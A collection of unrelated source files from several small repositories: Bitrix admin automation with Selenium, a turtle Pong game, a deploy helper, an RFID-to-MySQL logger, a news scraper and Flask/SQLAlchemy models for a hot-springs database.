bitrix_url_admin = bitrix_url + "/bitrix/admin/module_admin.php?lang=en"
b = selenium.webdriver.Chrome()
wait = WebDriverWait(b, TIMEOUT)
wait2 = WebDriverWait(b, SLOWPOKE_TIMEOUT)
actor = Actions(wait)
actor2 = Actions(wait2)
logging.info('Prepare Get URL')
#b.get('http://{{ bitrixip.stdout }}/bitrix/admin/module_admin.php?lang=en')
b.get(bitrix_url_admin)
logging.info('Get Ok')
global template_url
global site_edit_url
template_url_ip = "http://" + bitrix_ip
template_url = template_url_ip + "/bitrix/admin/template_edit.php?lang=en&ID=main"
site_edit_url = template_url_ip + "/bitrix/admin/partner_modules.php?lang=en"
logging.info('template_url: {0}'.format(template_url))
password_status = actor.wait_visible_pass(USER_PASSWORD)
logging.info('Password status {0}'.format(password_status))
actor.wait_clickable(USER_LOGIN).send_keys('<PASSWORD>')
actor.wait_visible(USER_PASSWORD).click()
#actor.wait_clickable(USER_PASSWORD).send_keys('<PASSWORD>819hr1br12br18qQ')
actor.wait_clickable(USER_PASSWORD).send_keys('{{ mysql_root_password }}')
actor.wait_clickable(KEEP_AUTH_TO_ADMIN).click()
actor.wait_clickable(LOGIN).click()
logging.info('Login Ok')
close_helper_check_and_close(b, actor)
driver = b
return driver
def close_helper_check_and_close(close_driver, actor):
logging.info('close_helper_check_and_close start')
logging.info('close_driver: {0}'.format(close_driver))
logging.info('actor: {0}'.format(actor))
close_sing_up_windows_status = actor.wait_visible_pass(SINGLE_LOGON_CLOSE_HELPER)
logging.info('............................................................................')
logging.info('close_sing_up_windows_status status {0}'.format(close_sing_up_windows_status))
logging.info('............................................................................')
if close_sing_up_windows_status is None:
logging.info('............................................................................')
logging.info('Button not finded, value is none')
logging.info('............................................................................')
else:
logging.info('............................................................................')
logging.info('Button finded:')
logging.info('close_sing_up_windows_status: {0}'.format(close_sing_up_windows_status))
logging.info('............................................................................')
close_button_by_id_object = actor.wait_visible_pass(CLOSE_BUTTON_BY_ID)
close_button_by_id_object.click()
dont_show_checkbox = actor.wait_visible_pass(DONTSHOW_CHECKBOX)
if dont_show_checkbox is None:
logging.info('dont_show_checkbox not finded, value is none')
else:
logging.info('dont_show_checkbox finded, go click')
dont_show_checkbox.click()
close_button_by_id_object_dontshow = actor.wait_visible_pass(CLOSE_BUTTON_BY_ID)
close_button_by_id_object_dontshow.click()
logging.info('close_helper_check_and_close done')
def main():
configure_logger()
logging.info('Started')
driver = login_to_admin()
# PRINT RESULTS
logging.info('BITRIX URL: {0}'.format(bitrix_url))
logging.info('BITRIX IP: {0}'.format(bitrix_ip))
logging.info('BITRIX URL ADMIN: {0}'.format(bitrix_url_admin))
wait = WebDriverWait(driver, TIMEOUT)
wait2 = WebDriverWait(driver, SLOWPOKE_TIMEOUT)
actor = Actions(wait)
actor2 = Actions(wait2)
driver.get(site_edit_url)
close_helper_check_and_close(driver, actor)
frame = driver.find_element_by_class_name('adm-list-table')
logging.info('frame: {0}'.format(frame))
links = frame.find_elements_by_xpath('.//*')
for link in links:
logging.info('...........................................')
global indi_variable
indi_variable = "Woinc 15.4.2"
_self_link_text = link.text
if indi_variable in _self_link_text:
global global_exclude_bitrix_sitecommunity
global_exclude_bitrix_sitecommunity = "bitrix.sitecommunity"
if global_exclude_bitrix_sitecommunity not in _self_link_text:
logging.info('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
logging.info('link: {0}'.format(link))
logging.info('Big win: {0} link_text: {1}'.format(driver, link.text))
logging.info('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
actionChains = ActionChains(driver)
actionChains.context_click(link).perform()
install_click = actor.wait_visible(INDIVID_INSTALL_OBJECT)
install_click.click()
return True
break
sys.exit(0)
logging.info('Finished')
return True
sys.exit(0)
if __name__ == "__main__":
# execute only if run as a script
main()
```
#### File: nginx/flask_site/app.py
```python
from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
tv_show = "The Office"
return render_template("index.html", show=tv_show)
if __name__ == "__name__":
app.run()
``` |
{
"source": "0zym4ndias/PingPong",
"score": 4
} |
#### File: 0zym4ndias/PingPong/juego_pong.py
```python
import turtle
window = turtle.Screen()
window.title("Pong game by @0zym4ndias") # Game title
window.bgcolor("grey12") # Background color
window.setup(width = 800, height = 600)
window.tracer(0) # It stops the window for updating, so that the game runs smoother
# Right paddle
right_paddle = turtle.Turtle()
right_paddle.speed(0) # Speed of animation - sets it to maxiumum speed
right_paddle.shape("square") # Shape of the padlet
right_paddle.color("white") # The color of the padlet
right_paddle.shapesize(stretch_wid = 5, stretch_len = 1) # We stretch the square
right_paddle.penup()
right_paddle.goto(350, 0) # The initial position of the paddle
# Left paddle
left_paddle = turtle.Turtle()
left_paddle.speed(0) # Speed of animation - sets it to maxiumum speed
left_paddle.shape("square") # Shape of the padlet
left_paddle.color("white") # The color of the padlet
left_paddle.shapesize(stretch_wid = 5, stretch_len = 1) # We stretch the square
left_paddle.penup()
left_paddle.goto(-350, 0) # The initial position of the paddle
# Ball
ball = turtle.Turtle()
ball.speed(0) # Speed of animation - sets it to maxiumum speed
ball.shape("square") # Shape of the padlet
ball.color("white") # The color of the padlet
ball.penup()
ball.goto(0, 0) # The initial position of the paddle
ball.dx = 0.1 # The ball moves by two pixels
ball.dy = 0.1 # The ball moves by two pixels
# Score
score_a = 0
score_b = 0
# Score_pen
score_pen = turtle.Turtle()
score_pen.speed(0) # Animation speed
score_pen.color("white")
score_pen.penup() # This is used to avoid drawing lines when it moves
score_pen.hideturtle()
score_pen.goto(0, 250) # Where the score is located
score_pen.write("Player A: 0 | Player B: 0", align = "center", font=("Lao MN", 24, "normal"))
# Function
def left_paddle_up():
y = left_paddle.ycor() # It returns the y coordinates
y += 20 # It will go up
left_paddle.sety(y) # Set the paddle to the new y coordinate
# Function
def left_paddle_down():
y = left_paddle.ycor() # It returns the y coordinates
y -= 20 # It will go down
left_paddle.sety(y) # Set the paddle to the new y coordinate
def right_paddle_up():
y = right_paddle.ycor() # It returns the y coordinates
y += 20 # It will go up
right_paddle.sety(y) # Set the paddle to the new y coordinate
# Function
def right_paddle_down():
y = right_paddle.ycor() # It returns the y coordinates
y -= 20 # It will go down
right_paddle.sety(y) # Set the paddle to the new y coordinate
# Keyboard
window.listen() # Listen for keyboard input
window.onkeypress(left_paddle_up, "w") # The w key will make the paddle go up
window.onkeypress(left_paddle_down, "s") # The s key will make the paddle go down
window.onkeypress(right_paddle_up, "Up") # The Up arrow will make the paddle go up
window.onkeypress(right_paddle_down, "Down") # The Down arrow will make the paddle go down
# Game loop
while True:
window.update() # Every single time the loop runs the window will update the screen
# Movement of the ball
ball.setx(ball.xcor() + ball.dx)
ball.sety(ball.ycor() + ball.dy)
# Borders of the window (Up & Down)
# Top
if ball.ycor() > 290:
ball.sety(290)
ball.dy *= -1 # It will reverse the direction of the ball
# Bottom
if ball.ycor() < -290:
ball.sety(-290)
ball.dy *= -1 # It will reverse the direction of the ball
# Put the ball back on the center if it goes out
if ball.xcor() > 390:
ball.goto(0, 0) # Put ball back to the center
ball.dx *= -1 # It will reverse the direction of the ball
score_a += 1
score_pen.clear() # This is to update the score correctly
score_pen.write("Player A: {} | Player B: {}".format(score_a, score_b), align = "center", font=("Lao MN", 24, "normal"))
if ball.xcor() < -390:
ball.goto(0, 0) # Put ball back to the center
ball.dx *= -1 # It will reverse the direction of the ball
score_b += 1
score_pen.clear() # This is to update the score correctly
score_pen.write("Player A: {} | Player B: {}".format(score_a, score_b), align = "center", font=("Lao MN", 24, "normal"))
# Collisons
# This will make the ball bounce with the right paddle
if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < right_paddle.ycor() + 40 and ball.ycor() > right_paddle.ycor() - 40):
ball.setx(340) # The ball will move to the left (just a little) so that the ball doesn´t stuck on the back of the paddle
ball.dx *= -1 # dx is positive and will bounce and go the other way (it will reverse the direction)
# This will make the ball bounce with the left paddle
if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < left_paddle.ycor() + 40 and ball.ycor() > left_paddle.ycor() - 40):
ball.setx(-340) # The ball will move to the left (just a little) so that the ball doesn´t stuck on the back of the paddle
ball.dx *= -1 # dx is positive and will bounce and go the other way (it will reverse the direction)
``` |
{
"source": "0zy/magistra",
"score": 2
} |
#### File: magistra/build/push_to.py
```python
import sys
import datetime
from subprocess import call
mappings = {
"prod" : "magistra-prod",
"staging" : "magistra-staging",
"dev1" : "magistra",
"local" : ""
}
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def cprint(text, color):
print color + text + bcolors.ENDC
def main():
if len(sys.argv) == 1:
help()
env = sys.argv[1];
cprint("PUSH_TO_ENVIRONMENT Input Environment: "+ env, bcolors.HEADER)
orig_file = ".env"
env_file = ".env." + env
backup_file = ".env_backups/.env.backup." + str(datetime.datetime.now().strftime("%A_%d_%B_%Y_%I_%M_%p"))
cprint("Env File: " + env_file, bcolors.OKBLUE)
if check_diff(env_file):
cprint( "Backup File: " + backup_file, bcolors.OKBLUE)
call(["cp", orig_file, backup_file])
call(["cp", env_file, orig_file])
else:
cprint( "No diff found", bcolors.OKBLUE)
if not mappings.has_key(env):
print "create heroku"
call(["gulp"])
if env == "local":
call(["php", "-S", "localhost:8000", "-t", "public/"])
else:
call(["build/try.sh"])
call(["git", "reset", "HEAD" , backup_file])
call(["git", "reset", "HEAD" , orig_file])
#scale dyno
def check_diff(env_file):
cprint("<diff>", bcolors.WARNING)
orig_file = ".env"
diff = call(["diff", orig_file, env_file, "--ignore-blank-lines"])
print "Diff: " + str(diff)
cprint("</diff>", bcolors.WARNING)
return diff
def help():
print "Please pass environment [production, staging, dev1]"
sys.exit(1)
if __name__ == "__main__":
main()
``` |
{
"source": "0zyxel0/Tapper_Gate",
"score": 2
} |
#### File: Tapper_Gate/Python/Scan_Insert.py
```python
import MySQLdb,time,datetime,serial
#indicate your COMPORT
usbport = 'COM8'
ser = serial.Serial(usbport, 9600, timeout = 1000)
conn = MySQLdb.connect(host="127.0.0.1", # your host, usually localhost
user="root", # your username
passwd="", # your password
db="tapper_db") # name of the data base
x = conn.cursor()
count=0;
gate_id = 'GTONE'
tryText = '';
def saveToDatabase(a,b,c):
x.execute("""INSERT into gate_history (card_id,createdate,gate_id) values(%s,%s,%s)""" ,(a,b,c))
conn.commit()
print "Successfully Inserted Values to Database : Card Id :"+a+", Time : "+b+ ", Gate:"+c+ "."
while count != 1:
try:
tryText = ser.readline(44);
convertToStr =str(tryText[33:]);
clean = convertToStr.rstrip('\r');
if clean.strip():
timestamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
saveToDatabase(clean,timestamp,gate_id)
timestamp = None;
else:
print 'Try Scanning Again..'
except:
print "failed"
conn.rollback()
``` |
{
"source": "0zyyy/mojokcoscraper",
"score": 3
} |
#### File: 0zyyy/mojokcoscraper/scrapper.py
```python
from bs4 import BeautifulSoup as bs
import requests
from csv import DictWriter
print("Import sukses")
def scrapeWeb():
halaman = int(input("Berapa halaman? "))
jenis_halam = input("Scrape halaman mana? ").lower()
all_news = []
for x in range(1,halaman + 1):
cap = requests.get(f"https://mojok.co/{jenis_halam}/page/{x}")
soup = bs(cap.text, "html.parser")
contain = soup.find(class_="jeg_postblock")
posts = contain.find_all(class_="jeg_post")
for post in posts:
uhuys = post.find(class_="jeg_post_title")
author = post.find(class_="jeg_meta_author")
all_news.append({
"Jungdul": uhuys.find("a").get_text(),
"Link": uhuys.find("a")["href"],
"Author": author.find("a").get_text()
})
# btn = soup.find(class_="next")
# print(str(len(all_news)) + " artikel ditemukan")
return all_news
news = scrapeWeb()
with open("news.csv","w") as file:
headers = ["Jungdul","Link","Author"]
csv_writer = DictWriter(file,fieldnames=headers)
csv_writer.writeheader()
for new in news:
csv_writer.writerow(new)
print("scrape success")
``` |
{
"source": "10000ms/aiohttp_mongodb_unit",
"score": 2
} |
#### File: aiohttp_mongodb_unit/server/route.py
```python
from aiohttp import web
from server.handler import user
def route():
route_list = [
web.post('/user/login', user.login),
web.post('/user/register', user.register),
web.post('/user/get_user_info', user.get_user_info),
web.post('/user/get_user_friend', user.get_user_friend),
web.post('/user/user_add_friend', user.user_add_friend),
web.post('/user/user_join_group', user.user_join_group),
web.post('/user/get_group', user.get_group),
# web.post('/user/change_group', user.change_group),
web.post('/user/create_group', user.create_group),
# web.post('/user/get_all_group', user.get_all_group),
]
return route_list
``` |
{
"source": "10000ms/aiohttp_redis_unit",
"score": 2
} |
#### File: 10000ms/aiohttp_redis_unit/main.py
```python
from multiprocessing import Process
from server import main as server_main
from reporter.reporter import main as reporter_main
def main():
server_process = Process(target=server_main)
reporter_process = Process(target=reporter_main)
server_process.start()
reporter_process.start()
server_process.join()
if __name__ == '__main__':
main()
```
#### File: aiohttp_redis_unit/server/utils.py
```python
import functools
import json
import aiohttp
from aiohttp import web
from config import config
from server.handler import error
from utils import set_logging
from redis_part import RedisConn
class ServerComponent:
logger = set_logging(config.SERVER_LOGGER_NAME)
session_db = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.SESSION_DB
).db
message_db = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.MESSAGE_DB
).db
remote_db = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.REMOTE_DB
).db
async def get_json_date(request, need_len=None):
data = await request.content.read()
data = data.decode()
data = json.loads(data)
ServerComponent.logger.info(data)
if need_len is None or len(data) == need_len:
return data
def check_remote(func):
@functools.wraps(func)
def wrapper(request):
if request.remote in config.TRUST_LIST:
return func(request)
else:
return error.handle_403()
return wrapper
def async_check_remote(func):
@functools.wraps(func)
async def wrapper(request):
if request.remote in config.TRUST_LIST:
return await func(request)
else:
return error.handle_403()
return wrapper
def general_json_data(status, info_dict=None):
status_data = {'status': status}
if info_dict is not None:
info_dict.update(status_data)
else:
info_dict = status_data
return info_dict
def get_data(func):
@functools.wraps(func)
async def wrapper(request):
get_json = await get_json_date(request)
if get_json is not None:
return func(get_json)
else:
return error.handle_400()
return wrapper
def async_get_data(func):
@functools.wraps(func)
async def wrapper(request):
get_json = await get_json_date(request)
if get_json is not None:
return await func(get_json)
else:
return error.handle_400()
return wrapper
def ok_response():
res_data = general_json_data('ok')
return web.json_response(data=res_data)
async def fetch(session, url, data):
ServerComponent.logger.info('发生post:' + str(url) + str(data))
async with session.post(url, data=data) as response:
return await response.text()
async def server_aio_client(url, data):
async with aiohttp.ClientSession() as session:
ServerComponent.logger.info('启动main_reporter')
res = await fetch(session, url, data)
return res
async def get_mongo_fetch_data(data, url):
json_data = json.dumps(data)
mongo_url = \
'http://' \
+ config.MONGODB_URL['host'] \
+ ':' \
+ str(config.MONGODB_URL['port']) \
+ url
res = await server_aio_client(mongo_url, json_data)
return json.loads(res)
```
#### File: aiohttp_redis_unit/test/redis_test.py
```python
import unittest
from redis_part import RedisConn
from config import config
class RedisTest(unittest.TestCase):
test_data_key = 'Test'
test_data_value = '111'
def setUp(self):
self.redis_conn = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.SESSION_DB
)
def test_conn(self):
self.redis_conn.db.set(self.test_data_key, self.test_data_value)
test_data = self.redis_conn.db.get(self.test_data_key)
assert test_data == self.test_data_value
self.redis_conn.db.delete(self.test_data_key)
def tearDown(self):
self.redis_conn.pool.disconnect()
``` |
{
"source": "10000volts/JLGLTaskList",
"score": 2
} |
#### File: JLGLTaskList/tasklist/models.py
```python
from django.db import models
from django.db.models import Q, Prefetch
from django.db import transaction
from utils.constants import TASK_STATUS, TASK_STATUS_CHOICES
class TaskList(models.Model):
name = models.CharField(verbose_name=u'任务清单名称', max_length=128, unique=True)
def __str__(self):
return self.name
class TaskManager(models.Manager):
def create_task(self, validated_data):
"""
:param validated_data: {"name": "string"}
:return:
"""
with transaction.atomic():
tl = validated_data.pop('tl')
self.check_valid(validated_data)
validated_data['status'] = TASK_STATUS.WAITING
validated_data['tl'] = tl
item = self.create(**validated_data)
return item
def check_valid(self, data):
q = self.filter(**data).exists()
if q:
raise Exception("已存在同名任务~")
class Task(models.Model):
objects = TaskManager()
name = models.CharField(verbose_name=u'任务名称', max_length=128)
status = models.PositiveSmallIntegerField(u'任务状态', default=TASK_STATUS.WAITING,
choices=TASK_STATUS_CHOICES)
tl = models.ForeignKey('tasklist.TaskList', on_delete=models.CASCADE,
related_name='task', verbose_name='任务所属清单')
def __str__(self):
return "{}:{} status:{}".format(self.tl.name, self.name, self.status)
``` |
{
"source": "1000in1/test",
"score": 3
} |
#### File: 1000in1/test/server.py
```python
import http.server
import socketserver
import socket
import urllib
class HTTPServerV6(http.server.HTTPServer):
address_family = socket.AF_INET6
class ServerHTTP(http.server.BaseHTTPRequestHandler):
getHandler={}
postHandler={}
def do_GET(self):
path = self.path
#print('path:',path)
#拆分url(也可根据拆分的url获取Get提交才数据),可以将不同的path和参数加载不同的html页面,或调用不同的方法返回不同的数据,来实现简单的网站或接口
query = urllib.parse.urlparse(path)
#query.hostname
#print('urlparse path',query)
#print('query',query.path)
if query.path in self.getHandler.keys():
self.getHandler[query.path](self)
else:
self.send_error(404,'not found!')
#print(urllib.parse.parse_qs(query.query))
#print(urllib.parse.parse_qsl(query.query))
def do_POST(self):
path = self.path
query = urllib.parse.urlparse(path)
if query.path in self.postHandler.keys():
self.postHandler[query.path](self)
else:
self.send_error(404,'not found!')
def init(self,p,m):
def decorator(fc):
if 'GET' in m:
self.getHandler[p]=fc
if 'POST' in m:
self.postHandler[p]=fc
#print(self.pathAction)
return decorator
#Handler = http.server.SimpleHTTPRequestHandler
@ServerHTTP.init(ServerHTTP,"/",['GET'])
def func1(self):
path = self.path
#print('path:',path)
#拆分url(也可根据拆分的url获取Get提交才数据),可以将不同的path和参数加载不同的html页面,或调用不同的方法返回不同的数据,来实现简单的网站或接口
query = urllib.parse.urlparse(path)
self.send_response(200)
self.send_header("Content-type","text/html")
self.send_header("test","This is test!")
self.end_headers()
buf = '''<!DOCTYPE HTML>
<html>
<head><title>Get page</title></head>
<body>
%s
%s
</body>
</html>'''%(self.path,query.hostname)
self.wfile.write(buf.encode(encoding="utf-8"))
@ServerHTTP.init(ServerHTTP,"/",['POST'])
def func2(self):
path = self.path
print(path)
print(self.headers)
name = self.headers['n']
print(name)
cmd = self.headers['cmd']
print(cmd)
query = urllib.parse.urlparse(path)
print('query',query)
#获取post提交的数据
fo = open("../share/%s"%name, "wb")
le = int(self.headers['content-length'])
self.send_response(200)
self.send_header("Content-type","text/html")
self.send_header("test","This is test!")
self.end_headers()
buf = '''<!DOCTYPE HTML>
<html>
<head><title>Post page</title></head>
<body>file:%s <br />size:%d'''%(name,le)
self.wfile.write(buf.encode(encoding="utf-8"))
l = 0
while l<le:
i=1024
if l+1024>le:
i = le-l
datas = self.rfile.read(i)
l = l+len(datas)
line = fo.write( datas )
buf = '%d/%d<br>'%(l,le)
print(buf)
self.wfile.write(buf.encode(encoding="utf-8"))
fo.close()
buf = '''</body>
</html>'''
self.wfile.write(buf.encode(encoding="utf-8"))
server = HTTPServerV6(('::', 8081), ServerHTTP)
server.serve_forever()
``` |
{
"source": "1000monkeys/MastermindRedux",
"score": 3
} |
#### File: MastermindRedux/helpers/DisplayManager.py
```python
from screens.MainMenu import MainMenu
class DisplayManager:
def __init__(self, pygame, screen) -> None:
self.screen = screen
self.main_menu = MainMenu(pygame, screen)
def get_current_screen(self):
return self.main_menu
def set_current_screen(self, screen_id):
self.screen_id = screen_id
```
#### File: MastermindRedux/helpers/Screen.py
```python
import sys
class Screen:
def __init__(self) -> None:
pass
def handle_events(self, events):
for event in events:
if event.type == self.pygame.QUIT:
sys.exit()
def draw(self, screen):
pass
``` |
{
"source": "1000peach/dnd-mentee-4th-9-repo",
"score": 2
} |
#### File: deployment/lambda/lmd_get_trigger.py
```python
import os
import pymysql
from typing import List # for type annotation
from log import logger
from db import get_connection
HOST = os.environ.get('DB_HOST', '3.34.87.77')
PORT = int(os.environ.get('DB_PORT', 3306))
USER = os.environ.get('DB_USER', 'root')
TABLE = os.environ.get('DB_TABLE', 'dnd')
PASSWORD = os.environ.get('DB_PASSWORD', 'password')
COLS = ['totalViews', 'todayViews', 'id']
# TODO: How to hide this password in serverless.yml ?
TEST_QUERY = 'SELECT 1 + 1 AS result'
GET_VIEWS_QUERY = 'SELECT id, totalViews, yesterDayViews, todayViews FROM plants WHERE 1=1'
def get_all_views(cursor: pymysql.connections.Connection.cursor) -> List[dict]:
try:
cursor.execute(GET_VIEWS_QUERY)
return cursor.fetchall()
except Exception as e:
logger.info(f'failed to fetch :{e}')
return []
def handler(event, context):
logger.info("this lambda has been invoked ")
logger.info(event)
conn = get_connection(HOST, PORT, USER, PASSWORD, TABLE)
with conn.cursor() as cur:
views = get_all_views(cur)
logger.info(views)
for v in views:
total_view, today_view, id = map(lambda x : v.get(x), COLS)
cur.execute(f'UPDATE plants SET totalViews = {total_view + today_view}, todayViews = {0}, yesterDayViews = {today_view} WHERE id={id}')
try:
conn.commit() # commit.
except Exception as e:
logger.info(f'error occured while commit : {e}')
if __name__ == "__main__":
conn = get_connection(HOST, PORT, USER, PASSWORD, TABLE)
with conn.cursor() as cur:
origin_views = get_all_views(cur)
# print(result)
for v in origin_views:
total_view, today_view, id = map(lambda x : v.get(x), COLS)
cur.execute(f'UPDATE plants SET totalViews = {total_view + today_view}, todayViews = {0}, yesterDayViews = {today_view} WHERE id={id}')
result = conn.commit() # commit.
print(result)
```
#### File: deployment/lambda/lmd_trigger.py
```python
import boto3
import os
import datetime
import time
import json
TRIGGERD_LAMDA = os.environ.get('TRIGGERD_LAMBDA', 'dnd-4th-9-seeat-batch-lambda-cron-get-trigger')
lmd = boto3.client('lambda')
def timenow_dt_strftime():
time_now = time.time()
dt = datetime.datetime.fromtimestamp(time_now)
return dt.strftime('%Y-%m-%d-%H-%M')
def handler(event, context):
print('lambda invoked ! ')
print(f'invoked time : {timenow_dt_strftime()}')
try:
lmd.invoke(
FunctionName=TRIGGERD_LAMDA,
InvocationType='Event', Payload=json.dumps({'dt' : timenow_dt_strftime()}) # this is dummy payload
)
except Exception as e:
print(f'error occured when triggering lambda : {e}')
``` |
{
"source": "1000Springs/web-app",
"score": 2
} |
#### File: web-app/hotspringsapp/models.py
```python
from hotspringsapp import app,db
from werkzeug.security import generate_password_hash, check_password_hash
from sqlalchemy.sql import text
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import sessionmaker
class Location(db.Model):
__tablename__ = 'public_location'
id = db.Column(db.Integer, primary_key=True)
feature_name = db.Column(db.String(50))
feature_system = db.Column(db.String(50))
district = db.Column(db.String(50))
location = db.Column(db.String(50))
lat = db.Column(db.Float)
lng = db.Column(db.Float)
description = db.Column(db.String(200))
private = db.Column(db.Boolean)
access = db.Column(db.String(15))
feature_type = db.Column(db.String(50))
def latestSample(self):
return Sample.query.filter(Location.id == self.id, Sample.location_id == Location.id ).order_by(Sample.location_id,Sample.date_gathered.desc()).first()
@staticmethod
def latestSampleIdsAllLocations():
query = text('select id from public_sample s where s.date_gathered = (select max(date_gathered) from public_sample where location_id = s.location_id limit 1 )')
rows = db.engine.execute(query).fetchall()
sample_ids = []
for row in rows:
sample_ids.append(row[0])
return sample_ids
def __init__(self,location_id,fName,latPos,lngPos,fSystem,dist,loc,desc,private,access):
self.id = location_id
self.feature_name = fName
self.feature_system = fSystem
self.district = dist
self.location = loc
self.lat = latPos
self.lng = lngPos
self.description = desc
self.private = private
self.access = access
def __repr__(self):
return '<Location {0} {1}>'.format(self.id,self.feature_name)
class Physical_data(db.Model):
__tablename__ = 'public_physical_data'
id = db.Column(db.Integer, primary_key=True)
initialTemp = db.Column(db.Float)
sampleTemp = db.Column(db.Float)
pH = db.Column(db.Float)
redox = db.Column(db.Float)
dO = db.Column(db.Float)
conductivity = db.Column(db.Float)
size = db.Column(db.String(20))
colour = db.Column(db.String(7))
ebullition = db.Column(db.String(50))
turbidity = db.Column(db.Float)
dnaVolume = db.Column(db.Float)
ferrousIronAbs = db.Column(db.Float)
def __init__(self, phys_id,iTemp,sTemp,ph,red,dis_ox,cond,date,size,colour,ebul,turb,dnaVol,ferIron):
self.id = phys_id
self.initialTemp = iTemp
self.pH = ph
self.redox = red
self.dO = dis_ox
self.conductivity = cond
self.size = size
self.colour = colour
self.ebullition = ebul
self.turbidity = turb
self.dnaVolume = dnaVol
self.ferrousIronAbs = ferIron
self.date_gathered = date
self.sampleTemp = sTemp
class Sample_Taxonomy(db.Model):
__tablename__ = 'public_sample_taxonomy'
id = db.Column(db.Integer, primary_key=True)
sample_id = db.Column( db.Integer, db.ForeignKey('public_sample.id'))
taxonomy_id = db.Column(db.Integer, db.ForeignKey('public_taxonomy.id'))
read_count = db.Column(db.Integer)
sample = db.relationship("Sample",backref="Sample_Taxonomy", lazy="select")
taxon = db.relationship("Taxonomy",backref="Sample_Taxonomy", lazy="joined")
class Taxonomy(db.Model):
__tablename__ = 'public_taxonomy'
id = db.Column(db.Integer, primary_key=True)
domain = db.Column(db.String(100), nullable=True)
phylum = db.Column(db.String(100), nullable=True)
Class = db.Column(db.String(100), nullable=True)
# read_count = db.Column(db.Integer, nullable=True)
def __getitem__(self,index):
return getattr(self,index)
class Sample(db.Model):
__tablename__ = 'public_sample'
id = db.Column(db.Integer, primary_key=True)
date_gathered = db.Column(db.DateTime, nullable=False)
sampler = db.Column(db.String(50), nullable=False)
sample_number = db.Column(db.String(50), nullable=False)
location_id = db.Column(db.Integer, db.ForeignKey("public_location.id"))
phys_id = db.Column(db.Integer, db.ForeignKey("public_physical_data.id"))
chem_id = db.Column(db.Integer, db.ForeignKey("public_chemical_data.id"))
location = db.relationship("Location",backref="Sample",lazy="select")
phys = db.relationship("Physical_data",backref="Sample",lazy="select")
image = db.relationship("Image",backref="Sample",lazy="select" , uselist=True)
chem = db.relationship("Chemical_data",backref="Sample",lazy="select")
samp_taxon = db.relationship("Sample_Taxonomy",backref="Sample",lazy="select")
taxon = association_proxy('samp_taxon', 'taxon')
def __init__(self,id,date,location,physID,chemID,sampleNum):
self.id = id
self.date_gathered = date
self.location_id = location
self.phys_id = physID
self.chem_id = chemID
self.sample_number = sampleNum
def getTaxonomy(self):
# Queries of views without primary keys don't fit very well in the
# SQLAlchemy ORM, so query the DB with raw SQL
column_names = ["read_count", "domain", "phylum", "class", "order", "family", "genus", "species"]
query = text(
'select `' + ('`,`'.join(column_names)) + '` from public_confident_taxonomy where sample_id = :sample_id' +
' order by `'+ ('`,`'.join(column_names[1:])) +'`'
)
rows = db.engine.execute(query, sample_id=self.id).fetchall()
return [dict(zip(column_names,row)) for row in rows]
def hasTaxonomy(self):
query = text(
'select * from public_sample_taxonomy where sample_id = :sample_id limit 1'
)
rows = db.engine.execute(query, sample_id=self.id).fetchall()
return len(rows) > 0
def __repr__(self):
return '<Sample {0} {1} {2}>'.format(self.id,self.location_id,self.date_gathered)
class Image(db.Model):
__tablename__ = 'public_image'
id = db.Column(db.Integer, primary_key=True)
sample_id = db.Column(db.Integer, db.ForeignKey("public_sample.id"), nullable=False)
image_path = db.Column(db.String (150), nullable = False)
image_type = db.Column(db.String (150))
def __init__(self,id,sid,iPath,iName):
self.id = id
self.sample_id = sid
self.image_path = iPath
self.image_name = iName
class User(db.Model):
username = db.Column(db.String(100), primary_key=True)
password = db.Column(db.String(100))
def __init__(self,username,password):
self.username = username
self.password = password
def check_password(self, password):
return check_password_hash(self.password,password)
class Chemical_data(db.Model):
__tablename__ = 'public_chemical_data'
id = db.Column(db.Integer, primary_key=True)
Li = db.Column(db.Float)
B = db.Column(db.Float)
N = db.Column(db.Float)
Na = db.Column(db.Float)
P = db.Column(db.Float)
Cl = db.Column(db.Float)
C = db.Column(db.Float)
Al = db.Column(db.Float)
Si = db.Column(db.Float)
K = db.Column(db.Float)
Ca = db.Column(db.Float)
V = db.Column(db.Float)
Cr = db.Column(db.Float)
Fe = db.Column(db.Float)
Mn = db.Column(db.Float)
cobalt = db.Column(db.Float)
Ni = db.Column(db.Float)
Cu = db.Column(db.Float)
Zn = db.Column(db.Float)
Mg = db.Column(db.Float)
As = db.Column(db.Float)
Se = db.Column(db.Float)
Br = db.Column(db.Float)
Sr = db.Column(db.Float)
Mo = db.Column(db.Float)
Ag = db.Column(db.Float)
Cd = db.Column(db.Float)
In = db.Column(db.Float)
Ba = db.Column(db.Float)
La = db.Column(db.Float)
Ti = db.Column(db.Float)
Pb = db.Column(db.Float)
Bi = db.Column(db.Float)
U = db.Column(db.Float)
CH4 = db.Column(db.Float)
H2S = db.Column(db.Float)
H2 = db.Column(db.Float)
CO = db.Column(db.Float)
nitrate = db.Column(db.Float)
nitrite = db.Column(db.Float)
ammonium = db.Column(db.Float)
sulfate = db.Column(db.Float)
chloride = db.Column(db.Float)
phosphate = db.Column(db.Float)
iron2 = db.Column(db.Float)
bicarbonate = db.Column(db.Float)
thallium = db.Column(db.Float)
def returnElements(self):
elements = []
elements.append(["Li",self.Li])
elements.append(["B",self.B])
elements.append(["N",self.N])
elements.append(["Na",self.Na])
elements.append(["P",self.P])
elements.append(["Cl",self.Cl])
elements.append(["C",self.C])
elements.append(["Al",self.Al])
elements.append(["Si",self.Si])
elements.append(["K",self.K])
elements.append(["Ca",self.Ca])
elements.append(["V",self.V])
elements.append(["Cr",self.Cr])
elements.append(["Fe",self.Fe])
elements.append(["Mn",self.Mn])
elements.append(["cobalt",self.cobalt])
elements.append(["Ni",self.Ni])
elements.append(["Cu",self.Cu])
elements.append(["Zn",self.Zn])
